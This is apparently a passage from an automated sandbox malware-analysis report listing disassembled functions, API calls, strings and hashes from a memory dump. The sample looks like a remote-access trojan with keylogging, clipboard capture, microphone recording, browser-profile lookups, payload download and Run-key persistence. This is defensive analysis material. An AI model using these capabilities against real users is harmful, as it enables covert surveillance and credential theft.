                                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                  • String ID:
                                                  • API String ID: 2633735394-0
                                                  • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                  • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                  • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                  • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                  Function 0041941E Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSystemMetrics.USER32(0000004C), ref: 0041942B
                                                  • GetSystemMetrics.USER32(0000004D), ref: 00419431
                                                  • GetSystemMetrics.USER32(0000004E), ref: 00419437
                                                  • GetSystemMetrics.USER32(0000004F), ref: 0041943D
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MetricsSystem
                                                  • String ID:
                                                  • API String ID: 4116985748-0
                                                  • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                  • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                  • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                  • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                  Function 00438FB1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                    • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                  • String ID:
                                                  • API String ID: 1761009282-0
                                                  • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                  • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                  • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                  • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                  Function 00442CAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorHandling__start
                                                  • String ID: pow
                                                  • API String ID: 3213639722-2276729525
                                                  • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                  • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                  • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                  • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                  Function 0040B783 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                  • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Init_thread_footer__onexit
                                                  • String ID: [End of clipboard]$[Text copied to clipboard]
                                                  • API String ID: 1881088180-3686566968
                                                  • Opcode ID: ed48047f974fffac8e7a9b5da0f857699ac9eabc6e4f24e176e756ae766f8f96
                                                  • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                  • Opcode Fuzzy Hash: ed48047f974fffac8e7a9b5da0f857699ac9eabc6e4f24e176e756ae766f8f96
                                                  • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                  Function 00451BB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ACP$OCP
                                                  • API String ID: 0-711371036
                                                  • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                  • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                  • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                  • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                  Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                  Strings
                                                  • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime
                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                  • API String ID: 481472006-1507639952
                                                  • Opcode ID: 76d5dd6ecd4cf0ae01fc24a6e422c0d46a6680b11c9869ab6839a1ab8c86e845
                                                  • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                  • Opcode Fuzzy Hash: 76d5dd6ecd4cf0ae01fc24a6e422c0d46a6680b11c9869ab6839a1ab8c86e845
                                                  • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                  Function 00416676 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNEL32 ref: 0041667B
                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DownloadFileSleep
                                                  • String ID: !D@
                                                  • API String ID: 1931167962-604454484
                                                  • Opcode ID: 9cbcf339d5782d21f0009647a5314bbf722ddb95791e80143436529d650ea742
                                                  • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                  • Opcode Fuzzy Hash: 9cbcf339d5782d21f0009647a5314bbf722ddb95791e80143436529d650ea742
                                                  • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                  Function 0041B580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime
                                                  • String ID: | $%02i:%02i:%02i:%03i
                                                  • API String ID: 481472006-2430845779
                                                  • Opcode ID: 4182ea60a7d59cd3c4daa7da87bafc9d2ec88e2c779713b19cbff176a10afb6b
                                                  • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                  • Opcode Fuzzy Hash: 4182ea60a7d59cd3c4daa7da87bafc9d2ec88e2c779713b19cbff176a10afb6b
                                                  • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                  Function 0041ADA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: alarm.wav$hYG
                                                  • API String ID: 1174141254-2782910960
                                                  • Opcode ID: a67f3d5249a1fb94c92f6e91cc59b1f19d843fcb2bd7b99b2c155253ed97e9bb
                                                  • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                                  • Opcode Fuzzy Hash: a67f3d5249a1fb94c92f6e91cc59b1f19d843fcb2bd7b99b2c155253ed97e9bb
                                                  • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                                  Function 0040B08C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                  • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                  • String ID: Online Keylogger Stopped
                                                  • API String ID: 1623830855-1496645233
                                                  • Opcode ID: d648d1a5222b06a5ee4967885c863a2486092fd33b051c0742ca5bf23bf5bbb2
                                                  • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                  • Opcode Fuzzy Hash: d648d1a5222b06a5ee4967885c863a2486092fd33b051c0742ca5bf23bf5bbb2
                                                  • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                  Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                                  • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$BufferHeaderPrepare
                                                  • String ID: XMG
                                                  • API String ID: 2315374483-813777761
                                                  • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                  • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                  • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                  • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                  Function 00448B66 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocaleValid
                                                  • String ID: IsValidLocaleName$kKD
                                                  • API String ID: 1901932003-3269126172
                                                  • Opcode ID: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                                  • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                  • Opcode Fuzzy Hash: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                                  • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                  Function 0040C4FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                  • API String ID: 1174141254-4188645398
                                                  • Opcode ID: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                  • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                  • Opcode Fuzzy Hash: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                  • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                  Function 0040C561 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                  • API String ID: 1174141254-2800177040
                                                  • Opcode ID: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                  • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                  • Opcode Fuzzy Hash: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                  • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                  Function 0040C5C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: AppData$\Opera Software\Opera Stable\
                                                  • API String ID: 1174141254-1629609700
                                                  • Opcode ID: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                  • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                  • Opcode Fuzzy Hash: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                  • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                  Function 0040B681 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetKeyState.USER32(00000011), ref: 0040B686
                                                    • Part of subcall function 0040A41B: GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A451
                                                    • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                    • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                    • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                    • Part of subcall function 0040A41B: GetKeyboardState.USER32(?,?,004750F0), ref: 0040A479
                                                    • Part of subcall function 0040A41B: ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                    • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                  • String ID: [AltL]$[AltR]
                                                  • API String ID: 2738857842-2658077756
                                                  • Opcode ID: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                  • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                  • Opcode Fuzzy Hash: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                  • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                  Function 004161C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExecuteShell
                                                  • String ID: !D@$open
                                                  • API String ID: 587946157-1586967515
                                                  • Opcode ID: 33d0e39c2c5277f948c9383974d65c92f33d2ad08035dd6aa383958bc01fb2b1
                                                  • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                  • Opcode Fuzzy Hash: 33d0e39c2c5277f948c9383974d65c92f33d2ad08035dd6aa383958bc01fb2b1
                                                  • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                  Function 0040B6DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: State
                                                  • String ID: [CtrlL]$[CtrlR]
                                                  • API String ID: 1649606143-2446555240
                                                  • Opcode ID: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                  • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                  • Opcode Fuzzy Hash: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                  • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                  Function 0040E7DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Init_thread_footer__onexit
                                                  • String ID: ,kG$0kG
                                                  • API String ID: 1881088180-2015055088
                                                  • Opcode ID: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                  • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                  • Opcode Fuzzy Hash: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                  • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                  Function 00413A5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D17F,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A6C
                                                  • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A80
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteOpenValue
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                  • API String ID: 2654517830-1051519024
                                                  • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                  • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                  • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                  • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                  Function 0040B8A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                  • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteDirectoryFileRemove
                                                  • String ID: pth_unenc
                                                  • API String ID: 3325800564-4028850238
                                                  • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                  • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                                  • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                  • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                                  Function 0041288B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                  • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ObjectProcessSingleTerminateWait
                                                  • String ID: pth_unenc
                                                  • API String ID: 1872346434-4028850238
                                                  • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                  • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                                                  • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                  • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                                                  Function 00440CE1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                  • GetLastError.KERNEL32 ref: 00440D85
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
